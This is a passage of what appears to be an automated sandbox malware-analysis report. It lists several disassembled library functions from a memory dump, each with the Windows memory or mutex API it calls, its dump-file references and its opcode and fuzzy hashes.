                                                                                                                                                                        • Instruction Fuzzy Hash: 07018462A0854641FF546FB9942537D2A609FE5B78F540330F93EDA3DAFE2CE4618240
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FE0A921C Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6FE0AAB79,?,?,?,00007FF6FE09AF01,?,?,?,?,00007FF6FE0B02A3), ref: 00007FF6FE0A9271
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                        • Opcode ID: 4ef4a8a9c81e310ef11842bcd22d7f0a9f6f10a443543fb6a607013a95f03771
                                                                                                                                                                        • Instruction ID: 43204c0f89d38b54d69f7eed8819d377479e5067b6ffe5d119b86ff5068713c6
                                                                                                                                                                        • Opcode Fuzzy Hash: 4ef4a8a9c81e310ef11842bcd22d7f0a9f6f10a443543fb6a607013a95f03771
                                                                                                                                                                        • Instruction Fuzzy Hash: 6DF04954F4920B81FF545AE5A4143B52A965FF9F80F884031ED2ED66EAFE1CE4A14320
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FE09AF9C Relevance: 1.5, APIs: 1, Instructions: 30COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        • Opcode ID: 2ee4ea5e302c4353973c3e6e1fb43efa5bc80fb753a258f7a760c2d1a5460acc
                                                                                                                                                                        • Instruction ID: 3960bfd398db0ebb6d8da2fa0a9950a47fd8af568e619d0db6bdb1fc26c5967b
                                                                                                                                                                        • Opcode Fuzzy Hash: 2ee4ea5e302c4353973c3e6e1fb43efa5bc80fb753a258f7a760c2d1a5460acc
                                                                                                                                                                        • Instruction Fuzzy Hash: 9EF0BE21A4C54641FB44AFAAA4211BC3AA0AFE5790F640230F67DD63CBFE2CE4618710
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FDFD5074 Relevance: 1.5, APIs: 1, Instructions: 30synchronizationCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateMutex
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1964310414-0
                                                                                                                                                                        • Opcode ID: 5bb28053021b0cd2a62d36c1000829e863951e7d25af3afc8164462e2c0a39a0
                                                                                                                                                                        • Instruction ID: 0a08c90a9e216e3b90b8f7bee2a0308713183bf1a6597ea9828531176415010a
                                                                                                                                                                        • Opcode Fuzzy Hash: 5bb28053021b0cd2a62d36c1000829e863951e7d25af3afc8164462e2c0a39a0
                                                                                                                                                                        • Instruction Fuzzy Hash: 6B016922205A8585D7069F3AC4444ACB7A4FB09F8DB0C4221DF885736CEF25E145C780
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FE02ADE0 Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,00007FF6FE02AF20,?,?,?,?,00007FF6FE02AABE), ref: 00007FF6FE02AE07
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                                                        • Opcode ID: b234133ac9701a7e180f97e51e021304d3a985ac5e6dee729acabcbe2f3f2af1
                                                                                                                                                                        • Instruction ID: e45ecabea6f0ba53fa6c7a1bd595c1a044387403f49951eb59987647abbb5bad
                                                                                                                                                                        • Opcode Fuzzy Hash: b234133ac9701a7e180f97e51e021304d3a985ac5e6dee729acabcbe2f3f2af1
                                                                                                                                                                        • Instruction Fuzzy Hash: EBE0C97261C68186D720CF15E44021ABBF4F7D4784F500525FACC43A58DF7DD5658F40
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FE02AD30 Relevance: 1.3, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                        • Opcode ID: aad2cdb57a82e606b8bf1909aa5a5b1721187632c9fd2cb9b286997d59227066
                                                                                                                                                                        • Instruction ID: 107d12280f06e02a3c87cc29b246904aaf086a87dee52fb07eb0e9c4e0ee9892
                                                                                                                                                                        • Opcode Fuzzy Hash: aad2cdb57a82e606b8bf1909aa5a5b1721187632c9fd2cb9b286997d59227066
                                                                                                                                                                        • Instruction Fuzzy Hash: 93F01232A08A8082D720AB04F44071ABBB0F7E4788F200125EACD43BA8DF7CC5658F40
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF6FE02ADA0 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                                                        • Opcode ID: b006abb5ba116a2f71ee889648bd5e80897fb5eb5064d67c4a973468b98a7769
                                                                                                                                                                        • Instruction ID: 107b4765735c1fb0a37367f30970987b9192e4c66a3a473580d2840daaf14f00
                                                                                                                                                                        • Opcode Fuzzy Hash: b006abb5ba116a2f71ee889648bd5e80897fb5eb5064d67c4a973468b98a7769
                                                                                                                                                                        • Instruction Fuzzy Hash: 91D0C931A18F8081D744DB16F88510ABBA5FBD5780F608425EAC942A28DF3CC1B98F40
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%